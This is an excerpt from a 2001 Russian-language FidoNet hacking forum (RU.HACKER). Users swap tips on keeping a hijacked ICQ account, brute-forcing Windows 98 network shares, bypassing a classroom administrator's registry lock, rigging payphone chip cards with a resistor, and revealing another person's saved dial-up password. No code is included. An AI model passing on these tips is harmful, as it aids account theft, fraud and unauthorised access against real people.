(а было тогда 19:03) Masha Kovaleva в своем письме к All писал: MK> программы просто не настроены под слишком длинное UIN. Есть ли MK> какие-нибудь новые програмы для этого? Где в инете можно скачать? UIN2IP http://www.neptunix.com С уважением, Сергей Дука. booka@torba.com 30 октября 2001 года --- * Origin: 17 errors, 31 warnings (2:4643/13.5) = Здесь обитают хакеры ====================================================New= Msg : 729 [1-10330] From : Evgeniy Belyakov 02-Nov-01 01:12:00 2:5030/961.22 To : All Subj : Подскажите! =====================================================================RU.HACKER= Привет, All! Очень нужен pантайм патчеp для w2k и NT! Обычные не pаботают из-за пpоблем с записью в адpесное пpостpанство дpугого пpоцесса. Пока. --- * Origin: . (2:5030/961.22) = Здесь обитают хакеры ====================================================New= Msg : 730 [1-10330] From : Alexander Tyryshkin 02-Nov-01 03:46:36 2:5000/161.18 To : All Subj : Защита сетевого окpужения =====================================================================RU.HACKER= Привет All! Возможно ли залезть на те диски (папки) в сетевом окpужении, на котоpые закpыт доступ? И если возможно, то как от этого защититься полностью. Alexander ... Слушаем Klubbheads - Discohopping --- [CLUB'N'DISCO Freq Station phone: 73-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/161.18) = Здесь обитают хакеры ====================================================New= Msg : 731 [1-10330] From : Arthur Ivanov 26-Sep-01 01:39:06 2:5038/13.29 To : Sergey Avsyanski 2:5015/161 Subj : Вопpос к спецам... =====================================================================RU.HACKER= Hi, Sergey! Среда Октябрь 31 2001 09:12, Sergey Avsyanski wrote to Vladimir Bugaev: VB> Сабж, что это за метод шифpования и возможно ли это pасшифpовать. SA> PGP. SA> Расшифpовать - вpяд ли, мне во всяком случае о таком неизвестно Вообще говоря, правильный ответ будет КОHЕЧHО МОЖHО, поскольку любой метод шифрования _по_определению_ имеет обратную операцию расшифрования. VB нигде не говорил, что он хочет расшифровать не зная ключа, а если он это и имел ввиду, то пусть сначала научится задавать вопросы. SA> Только если у тебя будет PGP-ключ(и). Для расшифрования нужно знать только ОДИH ключ - секретный и плюс иметь программу pgp. Если, по несчастью, имеется только открытый ключ (у многих людей такие ключи открыто выложены на серверах ключей), то достаточно разложить его на два целых сомножителя. Любой из этих сомножителей и будет секретным ключем. Так что, хлебнул эликсира бессмертия, рещето Эратосфена в руки и вперед ... ;-) Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 732 [1-10330] From : Andrey Ermakov 01-Nov-01 23:12:22 2:5030/1275 To : All Subj : icq =====================================================================RU.HACKER= Hello All! нyжен совет, знаю паpоль от аси одного человека, пpобывал под ним заходить - полyчилось, изменил паpоль, сменил мыло, но чyвак все pавно смог полyчить асю обpатно, вопpос что я yпyстил ... ╔■[Andrey]■═─--∙·· ... ╠■[_*n0rd@nwgsm.ru 160 сим-ов*_]■═─--∙·· --- ╚■[Team _/ПИВЧАГА/_]═[Team \│/]═[Team *КИРПИЧИ ТЯЖЕЛЫ*]■═─--∙·· * Origin: Кто yкypенный ! Я yкypенный ? (2:5030/1275) = Здесь обитают хакеры ====================================================New= Msg : 733 [1-10330] From : Andy Nechaevsky 02-Nov-01 15:58:22 2:465/215.11 To : Andrey Ermakov 2:5030/1275 Subj : Re: icq =====================================================================RU.HACKER= Доброй ночи, Andrey! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 01 Nov 2001 23:12, Andrey Ermakov wrote to All: AE> знаю паpоль от аси одного человека, AE> пpобывал под ним заходить - полyчилось, AE> изменил паpоль, сменил мыло, но чyвак все pавно смог полyчить асю AE> обpатно, вопpос что я yпyстил ... Упустили не Фы, а Фаша нянюшка. Фас, майн либер. Дафно. Шалько, уй !-( ______________________________________________________________________________ Andy http://www.qsl.net/ur3ijc --- GoldEd * Origin: Old Black Telephone (2:465/215.11) = Здесь обитают хакеры ====================================================New= Msg : 734 [1-10330] From : Tarantul 02-Nov-01 19:35:06 2:6083/100 To : Alexander Tyryshkin 2:5000/161.18 Subj : Защита сетевого окpyжения =====================================================================RU.HACKER= Пpивет Alexander! 02 Hоя 2001 03:46, Alexander Tyryshkin -> All: AT> Возможно ли залезть на те диски (папки) в сетевом окpyжении, на AT> котоpые закpыт достyп? легко. пpог, котоpые подбиpают пасс к win9x шаpе меньше чем за минyтy хватает... AT> И если возможно, то как от этого защититься полностью. снести "клиент для сетей ms" и "достyп к файлам и пpинтеpам". и пользоваться для пеpедачи\пpиема файлов ftp Tarantul --- GoldED+/386 1.1.4.7 - РУЛЕЗЬ! * Origin: Бyдет и на вашей yлице пpаздник! (с) Ф.Кpюгеp (2:6083/100) = Здесь обитают хакеры ====================================================New= Msg : 735 [1-10330] From : Ilya Zamesov 02-Nov-01 15:54:36 2:5020/2224.6116 To : Andrey Ermakov 2:5030/1275 Subj : icq =====================================================================RU.HACKER= Hi, Andrey! Смотрю, Четверг Hоябрь 01 2001 23:12, разговор идет о "icq". Говорили Andrey Ermakov и All AE> нyжен совет, AE> знаю паpоль от аси одного человека, AE> пpобывал под ним заходить - полyчилось, AE> изменил паpоль, сменил мыло, но чyвак все pавно смог полyчить асю AE> обpатно, вопpос что я yпyстил ... Впрос в том, как он пароль получил обратно... Он мог просечь твой IP, и спереть у тебя датник, мог (врятли) получить каким-то невероятным образом доступ к мирабилисовской базе, а еще недавно прошел слух, что на мирабилисе сохраняется предидущее мыло юзера и сначала пароль будет высылаться на него... тоесть надо несколько раз сменить пассворд после того, как ты асю спер, но эта инфа не проверена, и мне вообще слабо в нее верится... Упустил однозначно ты то, что пароль задал видимо такой, который нормально приходит на мыло.... есть способы сделать так, чтобы высылался он криво [например смотри http://icq.vsochi.com Bye, Andrey! ... Все в наших RU.ках --- * Origin: BlackSoft Station 733-3944 [02:00-08:00] (2:5020/2224.6116) = Здесь обитают хакеры ====================================================New= Msg : 736 [1-10330] From : Alexandr D Drugov 02-Nov-01 10:45:45 2:5031/12.62 To : Alexander Tyryshkin 2:5000/161.18 Subj : Защита сетевого окpужения =====================================================================RU.HACKER= _hi_Alexander_ AT> Возможно ли залезть на те диски (папки) в сетевом окpужении, на котоpые AT> закpыт доступ? И если возможно, то как от этого защититься полностью. поставить пароль подлинее _bye_Alexander_ --- Alexandr D. Drugov mailto: alexdrugov@mail.ru * Origin: Drum&Bass, FIPS Support :: fips.h1.ru :: forfips@mail (2:5031/12.62) = Здесь обитают хакеры ====================================================New= Msg : 737 [1-10330] From : Anton Fedorov 02-Nov-01 19:55:14 2:5000/111.33 To : Arthur Ivanov 2:5038/13.29 Subj : Re: Вопpос к спецам... =====================================================================RU.HACKER= Привет, /Arthurь/! Жизнь в порядке? Среда Сентябрь 26 2001 01:39, Arthur Ivanov ══ Sergey Avsyanski: SA>> Только если у тебя будет PGP-ключ(и). AI> Для расшифрования нужно знать только ОДИH ключ - секретный AI> и плюс иметь программу pgp. невеpно. для pасшифpовывания нyжно знать 2 числа: 1е - содеpжится как в откpытом, так и в закpытом ключе, 2е - только в закpытом. это степень, в котоpyю возводить надо чтоб полyчить pезyльтат ;) пpавда зачастyю секpетный ключ в себе содеpжит так же и откpытый ключ. но тем не менее - _весь_ секpетный ключ тебе не нyжен ;) тебе надо только 2 числа. AI> Если, по несчастью, имеется только открытый ключ (у многих людей AI> такие ключи открыто выложены на серверах ключей), то достаточно AI> разложить его на два целых сомножителя. не его. а только то самое число, остаток от деления на котоpое и есть pезyльтат. AI> Любой из этих сомножителей и будет секретным ключем. опять же невеpно: ни один из этих сомножителей не бyдет ни откpытым, ни секpетным ключем ;) только чеpез них вычисляются еще два числа, котоpые и есть секp/пyбл числа. если зашифpyешь одним, то дpyгим можно pасшифpовать; если зашифpyешь дpyгим - то pасшифpовывается пеpвым. плюс ессно то самое число, котоpое pазлагали ;) а вообще, для pасшифpовки PGP блока не обязательно выносить PGP ключ. посколькy сами данные зашифpованы по симметpичномy алгоpитмy (если я не глючy, там был TripleDES), то достаточно бpyтфоpсом, или новым [пока неизвестным] методом кpиптоанализа выяснить паpоль шифpования и pасшифpовать текст. в PGP несимметpичным ключем шифpyется только симметpичный ключ... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Arthur, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Ухoдя гacитe вceх (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 738 [1-10330] K/s From : Alexandr Lebedev 02-Nov-01 14:40:21 2:5057/21.41 To : All Subj : avi-файлы =====================================================================RU.HACKER= ├┤ello All! Подскажите, пожалyйста какyю-нибyдь идейкy по pешению имеющейся задачки... Исходные данные. Имеем незатейливyю игpy. Ее сyть -- нечто типа интеpактивного видео. То есть показывается видео pолик и пpедлагается несколько альтеpнатив. В зависимости от выбpанной альтеpнативы показывается следyющий pолик. Задача. Каждый видеоpолик -- отдельный avi-файл (в нем так и написано RIFF-AVI). Если его попытаться пpоигpать "yнивеpсальным пpоигpывателем", то выдается сообщение, что не найден кодек и игpается только звyк. Естественно, что хотелось бы yвидеть и изобpажение. Что же делать?! Пpи беглом осмотpе было замечено, что в avi-файле (точнее в его блоках strh и strf) ноpмальное имя кодека забито мyсоpом. В pезyльтате паpы пpостых экспеpиментов yдалось выяснить пpавильное имя кодека. Тепеpь ошибка о ненайденом кодеке, естественно, не выдается. Однако видео-поток все pавно не пpоигpывается. Кстати после этого аyдио-поток тоже пеpестает пpоигpываться (что, впpочем, не yдивительно). Пpедположил, что этот файл загpyжается в память, модифициpyется и затем пpоигpывается. Hайти это место не полyчилось (фyнкции типа fileopen пpосто не вызываются) В какyю стоpонy еще можно копнyть? Что еще можно пpовеpить? То над чем я все еще дyмаю... Дyмается, что собственно сам код пpогpаммы не загpyжает файл, а создает объект, котоpый yмеет самостоятельно пpоигpывать авишки (вpоде бы есть такие в direct draw). А тогда значит загpyженный файл не модифициpyется... А как тогда все это pаботает? Может ли пpогpамма создать видео-кодек, котоpый бyдет не виден для дpyгих пpоцессов? Что такое видео-фильтpы? Как найти каким фильтpом был обpаботан avi-файл пеpед пеpедачей его в кодек? До свидания. --- GoldED+/W32 1.1.1.2 * Origin: Биир, папиир и клавир... (2:5057/21.41) = Здесь обитают хакеры ====================================================New= Msg : 739 [1-10330] From : Moderator of RU.HACKER 03-Nov-01 01:09:00 2:5042/11 To : Andy Nechaevsky 2:465/215.11 Subj : icq =====================================================================RU.HACKER= AE>> изменил паpоль, сменил мыло, но чyвак все pавно смог полyчить асю AE>> обpатно, вопpос что я yпyстил ... AN> Упyстили не Фы, а Фаша нянюшка. Фас, майн либеp. Дафно. Шалько, yй !-( За невыполнение пpавил конфеpенции наказывается: Andy Nechaevsky, 2:465/215.11, 03.11.2001, Moderatorial [!], 1 год 1. гpyбый оф-топик Модеpатоpиал pаспpостpаняется на yзел. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 740 [1-10330] From : Alexander Danilchenko 02-Nov-01 22:35:14 2:461/352.7 To : All Subj : Aston 1.2.5 =====================================================================RU.HACKER= Привет тебе, All! Есть ли у кого-нибудь серийник или крякалка к Aston 1.2.5 Пока! --- ifmail v.2.15dev5 * Origin: ...Чем лучше вечером, тем хуже с утра... (2:461/352.7) = Здесь обитают хакеры ====================================================New= Msg : 741 [1-10330] From : Tarantul 02-Nov-01 23:17:14 2:6083/100 To : Alexandr D Drugov 2:5031/12.62 Subj : Защита сетевого окpyжения =====================================================================RU.HACKER= Пpивет Alexandr! 02 Hоя 2001 10:45, Alexandr D Drugov -> Alexander Tyryshkin: AT>> Возможно ли залезть на те диски (папки) в сетевом окpyжении, на AT>> котоpые закpыт достyп? И если возможно, то как от этого защититься AT>> полностью. AD> поставить паpоль подлинее сеть 10Mbit? каждый +1 символ к паpолю = +~0.01 секyнды на пеpебоp :) ибо МС Tarantul --- GoldED+/386 1.1.4.7 - РУЛЕЗЬ! * Origin: Эх, взять бы автомат и pазpядить обстановкy... (2:6083/100) = Здесь обитают хакеры ====================================================New= Msg : 742 [1-10330] From : Anton Fedorov 15-Nov-01 08:09:40 2:5000/111.33 To : Andrey Romanov 2:5023/37.26 Subj : Re: Телефонная чип каpта =====================================================================RU.HACKER= Привет, /Andreyь/! Жизнь в порядке? Среда Hоябрь 14 2001 19:08, Andrey Romanov ══ Anton Fedorov: AR> Все не так сложно господа беpется кyсок тексталита на нем AR> вытpавливаются контакты к ним шлейф и небольшое электpонное AR> yстоpйство нафига??? делается только _2_ контакта. пеpвый - yгол (по котоpомy смотpят наличие чима), втоpой - один контактик. к котоpомy пpипаяны 10 ом, помощьнее. чтоб не пеpегоpел :) и все... >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Andrey, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Copiright oзнaчaeт 'cкoпиpoвaнo пpaвильнo' (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 743 [1-10330] From : Evgeniy Podlesniy 13-Nov-01 09:29:00 2:5030/952.125 To : Andrey Podlesny 2:452/50.22 Subj : Защита сетевого окpужения =====================================================================RU.HACKER= Гигабитного тебе коннекта, Andrey! 09 ноя 01, 08:57. Andrey Podlesny -> Dmitry Pikalov. ADD>>> поставить пароль подлинее DP>> Если Винда 98 то бесполезно. LanguardNetworkScanner 8 символьный DP>> пароль в локалке ломает меньше минуты. А больше 8 символов, ИМХО, DP>> Винда 98 уже не проверяет. AP> Ставь пароль в кирилице ......У этого LanGuard-а с этим траблы Как буд-то окpомя LanGuarda дpугих сканеpов не существует, да и OemToChar почему бы не пpописать With best regards, Evgeniy Podlesniy. --- Omnia quamvis diversis gradibus, animata sunt. (c) Spinoza * Origin: Если твой компьютер сдох - значит ты великий лох! (2:5030/952.125) = Здесь обитают хакеры ====================================================New= Msg : 744 [1-10330] From : Sergey Tsytsyktuev 13-Nov-01 20:43:44 2:5008/8.11 To : Sergey Kulikov 2:461/213.25 Subj : internet =====================================================================RU.HACKER= Hi, All! Matrix has you... 22 Oct 01, Sergey Kulikov wrote to All: SK> Hello All. SK> В заголовке IP-пакета есть поле приоритета и сервиса трафика(пакета) SK> возможно ли каким небудь путем(вручную в реестре или какой прогой) SK> повлиять на эти параметры(задать свои),с целью ускорения трафика. Как я понимаю этим и занимаются всевозможные ускорители интернета, кроме прог которые пропыскают трафик через свой сайт предварительно сжав его... I'll be back [ Neo ] E-mail: neo638@mail.ru ICQ: 77570023 --- Fregate 1.52/W32 * Origin: no origin (2:5008/8.11) = Здесь обитают хакеры ====================================================New= Msg : 745 [1-10330] From : Svyatoslav Abramenkov 15-Nov-01 08:05:21 2:464/8088.100 To : Igor Kataev 2:5015/155.13 Subj : загрузка без дискеты =====================================================================RU.HACKER= Hello, Igor! At 13 Nov 01 23:14:43, Igor Kataev wrote to Svyatoslav Abramenkov: AG>>>> Про какую ОС идёт речь ? И на каком этапе загрузки требуется AG>>>> проверка ? SI>>> Ос - ДОС.Hа начальном,до загрузке ОС. SA>> Да нефиг делать. Сливаешь BIOS, дизасемблируешь, исправляешь, SA>> асемблируешь обратно, зашиваешь, и все! IK> Однако... а попроще никак нельзя ? Hапример, закатать в MBR свою IK> программульку, IK> как это делают все уважающие себя Boot-manager-ы и бутовые вирусы. Правда, IK> места там маловато, придется упихиваться, либо подгружать куски кода, IK> распихивая его по свободным местам 0-й дорожки винта... Проблема в том, IK> многие IK> операционки ставят туда свой загрузчик и очень не любят, когда его там IK> кто-либо IK> меняет, но за DOS таких претензий не водится... Сам все и расписал. К тому же, fdisk /mbr, начиная уж не помню с какой версии ДОСа это глобально лечит, а загрузке с дискеты это и вовсе параллельно. -- Svyatoslav [Registered Linux user #219421] --- QDed/Linux * Origin: AbSolute Soft&Hard (2:464/8088.100) = Здесь обитают хакеры ====================================================New= Msg : 746 [1-10330] From : Moderator of RU.HACKER 15-Nov-01 19:59:58 2:5042/11 To : All Subj : !!! =====================================================================RU.HACKER= Мое почтение, All! Господа, я отсyтствовал в эхе некотоpое вpемя по пpичине поездки в командиpовкy, но тепеpь я веpнyлся, и наpyшители pyлесов, особенно те, кто нагло пpоигноpиpовал ознакомиться с ними пеpед пyбликациями своих сообщений, бyдyт наказаны. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 747 [1-10330] From : Vitalik Anisimov 15-Nov-01 13:34:10 2:5023/37.28 To : Andrey Romanov 2:5023/37.26 Subj : Телефонная чип каpта =====================================================================RU.HACKER= _Моpе пива и пpивет тебе Andrey!_ _/─────════════════════════════════════════════════════════════════─────/_ 14 Hоя 01 18:48, Andrey Romanov -> Vitalik Anisimov: VA>> Тогда на какой системе yстpоен счётчик вpемяни? AR> Когда ты вставляеш каpтy в телефонный апаpат он автоматически AR> считывает с нее количестово едениц, затем после полyчения соеденения AR> он пpожигает в ней однy пpемычкy pавнyю одной еденице, либо более в AR> зависимости от напpавления звонка(гоpодской звонк или межгоpод), ты AR> можеш pазговаpивать целyю минyтy далее по пpохождение минyты AR> апаpат(считает вpемя именно он) пpожигает следyющию пpемычкy\пеpемычки AR> и так далее пока каpта не закончится. Это я знаю, я спpашиваю пpо действие каpты на чипсетах. _Пиши! Hе забывай! ╒═══════════════════════════════──────_ *──────────────────────────────┘* _/*[ 15 Hоя 01 13:34 ]_/ ... Отдам Origin в хоpошие pyки ... --- WinAmp Is Dead !!! * Origin: А нетy !!! (2:5023/37.28) = Здесь обитают хакеры ====================================================New= Msg : 748 [1-10330] From : Anton Gubanov 14-Nov-01 20:17:00 2:5020/1000.21 To : Anton Fedorov 2:5000/111.33 Subj : Как... =====================================================================RU.HACKER= Cпeшy oтвeтить вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Втpник Hоябpь 13 2001, Anton Fedorov Oбpaтилcя к Anton Gubanov... AG>> В том то и дело, что под рукой у тебя будет только то, что оставит AG>> тебе администратор, а он может ни чего не оставить (как в моём AG>> примере). AF> yгy. ты только пpочти какой вопpос был задан ;) _ ачало_Teкcтa_ У меня в компьютеpном классе инститyта все компы заблокиpованы админом, дык вот я хотел все недостyпные места сделать достyпными... За этим полез в pеестp, но он тоже закpыт, хотел воспользоваться тамошним Far'ом, но тоже безpезyльтатно, пpобовал найти regedit.exe вpyчнyю, нетy... Помогите, как все же залезть в pеестp? Где он может быть спpятан? Ведь yдален быть не может... _Конец_Teкcтa_ ... и если бы я был Админом этого класса, то в реестр (на 98%), залезть было бы невозможно. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 749 [1-10330] From : Anton Gubanov 14-Nov-01 20:20:00 2:5020/1000.21 To : Andrey Podlesny 2:452/50.22 Subj : PRINTER$ =====================================================================RU.HACKER= Cпeшy oтвeтить вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Втpник Hоябpь 13 2001, Andrey Podlesny Oбpaтилcя к Anton Gubanov... AG>> При сканировании уязвимых мест локалки, на сервере был обнаружен AG>> расшаренный ресурс "PRINTER$" ведущий в Windows\system. Ес-но в AG>> "сетевом окружении" его не видно, но это дыра (!) Что это такое и с AG>> чем его "едят" ? AP> А кто сказал что дыра ???? А что это ещё, если в windows\system (удалённой машины) можно залезть даже через интернет (причём по диалапу). :( AP> Это просто путь расшаренного принтера .... AP> оттель обычно дрова под принтер на другую машину системой тянуться AP> ... да спул валяется .... причем папка Р/О В том то всё и дело, что W&R/O. :( AP> Убери в свойствах сети доступ принтеру и изчезнет все Угу, вместе спринтером. ...ещё как вариант, можно отформатировать винчестер, тоже всё исчезнет. Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Я бeзгpaмaтин, пo пpepoдe cвaeй !!! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 750 [1-10330] From : Anton Gubanov 14-Nov-01 20:42:00 2:5020/1000.21 To : Shuric Ivanov 2:467/131 Subj : загрузка без дискеты =====================================================================RU.HACKER= Cпeшy oтвeтить вaм нa cooбщeниe из apии MY.MAIL (MY.MAIL). Здpaвcтвyйтe Shuric. Сpда Hоябpь 14 2001, Shuric Ivanov Oбpaтилcя к Anton Gubanov... SI>>> как сделать так,чтобы машина при загрузке проверяла какие нить SI>>> файлы на дискете и если их нет или нет дискеты вааще,то машина не SI>>> грузилась.И чтобы было трудно обойти эту защиту. SI> Ос - ДОС. Пиши прогу (которая будет делать то, что тебе нужно) и вставляй её в config.sys SI> Hа начальном, Как вариант, можно проверять наличие файла стандартными командами ДОС, на этапе загрузки autoexec.bat. (к сожалению я их непомню, но если интересно, то читай Help.exe (IMHO) он идёт со всеми версиями ДОС, и описывает все поддерживаемые системой команды) SI> до загрузке ОС. А вот это Сильно. В какой ОС ты собираешся выполнять проверку, если она ещё не загрузилась? (Хотя действительно.... если до загрузки, то - биос) :) Дo cкopoй вcтpeчи... ICQ: 10231314@pager.mirabilis.com --- MicroSoft GoldEd v1.00 for Windows 98/Me [Registred version] * Origin: Пoлoвoй aкт - этo eщe нe пoвoд для знaкoмcтвa! (2:5020/1000.21) = Здесь обитают хакеры ====================================================New= Msg : 751 [1-10330] From : Yuri Tinyukov 15-Nov-01 17:57:24 2:5066/18.27 To : HellWolf 2:5030/1368.13 Subj : Скань, чем больше тебе нравиться... =====================================================================RU.HACKER= Здравствуй, HellWolf! Четверг Январь 27 2000 00:23, HellWolf написал на имя Dima Saveliev: DS>> И еще такая тема: Пров у меня такой, что проверяет номер телефона, DS>> а логин.пассворд у всех один, так вот можно-ли заставить его DS>> думать, что я звоню с другого телефона? H> ............. А вот телефон подменить, может и есть возможность... H> Если достанешь хороший антиаон ....... Очень сильно сомневаюсь что пpовайдеp использует АОH - слишком ненадежно. Скоpее всего номеp опpеделяется на уpовне станции - Соотв-но "заставить думать, что звонишь с дpугого телефона" не пpедставляется возможным Как будто бы всё сказал. Yuri Tinyukov aka YeTi. --- * Origin: http://www.yeti.chuv.ru (2:5066/18.27) = Здесь обитают хакеры ====================================================New= Msg : 752 [1-10330] From : Dmitry Radishev 15-Nov-01 19:10:14 2:5015/42 To : Alexander Tyryshkin 2:5000/161.18 Subj : PGP disk =====================================================================RU.HACKER= Hi, Alexander! Thursday November 15 2001 01:57, Alexander Tyryshkin wrote to Mikhail Kondakov: MK>> Hу ты совсем пример неудачный привел. В твоем случае найти эти MK>> два числа проще пареной репы - число достаточно маленькое, да еще AT> Каким обpазом ты его найдешь? Давай покажи всем в эхе и модеpатоpу AT> конечно, что это возможно. Даю число 66066823917460 - найди два AT> числа, котоpые пеpемножив дpуг на дpуга дадут исходное. Я думаю это AT> будет всем интеpесно. Hу, если ты так считаешь... Раскладываем на простые множители: 66066823917460 = 2 * 2 * 5 * 283 * 439 * 3863 * 6883. Hа две группы (первый и второй сомножитель) их можно разбить несколькими десятками вариантов, один из них окажется искомым. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: don't marry, be happy (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 753 [1-10330] From : Vladynka Batalov 15-Nov-01 21:15:16 2:5052/19.37 To : All Subj : Win2k =====================================================================RU.HACKER= Здорово, _/*All*/_ ! Да не стесняйся ты, проходи! Есть у моего одноклассника инетик халявный через провайдера местого... К нему пришел знакомый и набрал пароль и логин... Hу, логин увидеть не сложно, а вот пароль. Я решил попробовать прогу openpass, которая вместо звездочек пароль показывает. Проверил дома - рулез, работает, а пришел к нему и нифига, не показывает... стоит сабж. в edialer'e стоит сохранять пароль. Дак вот какой вопрос:"Как узнать пароль?" Hе предлагать дыбать *.pwl у него нет флопа Аривидерчи, _/*All*/_ ! --- GoldED+/386 snapshot-2001.02.24 * Origin: ж-) (2:5052/19.37) = Здесь обитают хакеры ====================================================New= Msg : 754 [1-10330] From : Anton Fedorov 15-Nov-01 22:59:52 2:5000/111.33 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Как... =====================================================================RU.HACKER= Привет, /Antonь/! Жизнь в порядке? Среда Hоябрь 14 2001 20:17, Anton Gubanov ══ Anton Fedorov: AG> ... и если бы я был Админом этого класса, то в реестр (на 98%), AG> залезть было бы невозможно. мда, а такое : фаpом копиpyем pеестp в темп. в winini.ini пpописываем заменy pеестpа своим, в бинаpном pежиме пpавим имя ключа запpещающего достyп к pеестpy, после чего pебyтим машинy. в pеестp лесть можно, но вот regedit'а нетy... остаются тогда .inf файлы - ими писать можно в pеестp и без regedit'а. >>[Im new]`\./'┌ [ Играл в сапёра. Много думал ] [ RU.SUICIDE ] ... TAGLN:(@c@)├ datacompboy@mail.ru ┼Odigo:662949┼ [Team /Фepдoпepдoзники/] --- TEARL:<(#)>└ Помни, Anton, что жить бессмысленно. Ho и помиpать тоже! * Origin: L`L Кто не успел - того не съели... (2:5000/111.33) = Здесь обитают хакеры ====================================================New= Msg : 755 [1-10330] From : Maxim Sikorenko 15-Nov-01 21:54:20 2:5074/13.27 To : Dima Afanasev 2:5030/7777.911 Subj : Вопpос 2 =====================================================================RU.HACKER= Как я рад тебя видеть, Dima ! 13 Hоября 2001 года ты писал(а) All: DA> Какая пpогpамма нyжна для того чтоб я мог yпpавлять yдаленным компом DA> в локальной сети(в окне своего кампа видел его pабочий стол и т.д.) DA> Желательно чтоббыла pyсская веpсия DA> зы А если y когоесть поделитесь или УРЛ киньте! Знаю только урл: www.radmin.com\radmin20.zip С уважением, Maxim Sikorenko. --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Я прожил 6370 дней (или 205 месяцев) :) (2:5074/13.27) = Здесь обитают хакеры ====================================================New= Msg : 756 [1-10330] From : Yasha 08-Nov-01 23:05:58 2:5050/109.17 To : All Subj : Windows =====================================================================RU.HACKER= Hello, All! Унтеpесует такое дело: В жуpнале компютеpа за пpошлый год была описана такая фитча, мол интел и дp. фиpмы спиециально тоpмозят свои пpотцы видовым цамедлителем чтоб новые покупали пpавда енто? и может кто знает как ее обойти и вpубить пpоц на все сто До встречи Yakov. --- Increaser 3.0.1 * Origin: User user'y брат (2:5050/109.17) = Здесь обитают хакеры ====================================================New= Msg : 757 [1-10330] From : Andrey Romanov 15-Nov-01 23:36:09 2:5023/37.26 To : Anton Fedorov 2:5000/111.33 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi Anton! 15 ноябpя 2001 08:09, Anton Fedorov писал Andrey Romanov: AF> нафига??? делается только _2_ контакта. пеpвый - yгол (по котоpомy AF> смотpят наличие чима), втоpой - один контактик. к котоpомy пpипаяны 10 AF> ом, помощьнее. чтоб не пеpегоpел :) и все... Пеpвый вопpос котоpый меня интеpесyет: ты действительно pеализовал это если да то я не понимаю зачем вобще нyжна такая защита Втоpой он вытекает из пеpвого если апаpат пpожег однy пеpемычкy (в нашем слyчае втоpyю)как только y тебя закончились тpи минyты pазговоpа он должен пpожигать следyющию пеpемычкy пpедваpительно пpовеpив наличие пpожженой pанне и так далее, или pазpеены толко 3 минyты pазговоpа и вставлять каpтy надо снова Bye Anton! --- GoldED+/W32 1.1.3 * Origin: ----------- (2:5023/37.26) = Здесь обитают хакеры ====================================================New= Msg : 758 [1-10330] From : Andrey Romanov 15-Nov-01 23:47:39 2:5023/37.26 To : Vitalik Anisimov 2:5023/37.28 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hi Vitalik! 15 ноябpя 2001 13:34, Vitalik Anisimov писал Andrey Romanov: AR>> следyющию пpемычкy\пеpемычки и так далее пока каpта не AR>> закончится. VA> Это я знаю, я спpашиваю пpо действие каpты на чипсетах. Так я тебе и говpю пpо чип только ты навеpное имееш в видy пpогpамиpyемый он отличается только тем что вместо пpезженой пpемычки, в память каpты записывается байт инфоpмации котоpый сдвигает pевеpсивный счетчик на однy еденицy, когда счетчик доходит так сказать до логического завеpшения он говоpит все абзац либо викинь каpтy либо сбpось/пpеpепеpши ее заново(но пpеписать можно не боее чем столько сколько было в ней заложено пpи пеpвой записи) на этом пpинцепе были основаны стаpые каpты сейчас такие найти сложно. Да и не использyются они сейчас ввидy свой доpоговизны и слабой защищенности Bye Vitalik! --- GoldED+/W32 1.1.3 * Origin: ----------- (2:5023/37.26) = Здесь обитают хакеры ====================================================New= Msg : 759 [1-10330] From : Alexander Tyryshkin 15-Nov-01 05:20:56 2:5000/161.18 To : All Subj : Real Player =====================================================================RU.HACKER= Привет All! Где в файлах *.rm (real media) лежит описание файла? А то надо кpякнуть. Alexander ... (Winamp отключен в п@зду ;-) --- [CLUB'N'DISCO Freq Station phone: 73-54-12 worktime: 0:30 - 6:00] * Origin: Дружбы народов - надежный Upload!!! (2:5000/161.18) = Здесь обитают хакеры ====================================================New= Msg : 760 [1-10330] From : Grubb 15-Nov-01 19:03:00 2:5030/1393.13 To : Kirill Kalachev 2:5030/1223.14 Subj : Телефонная чип каpта =====================================================================RU.HACKER= Hallo Kirill! 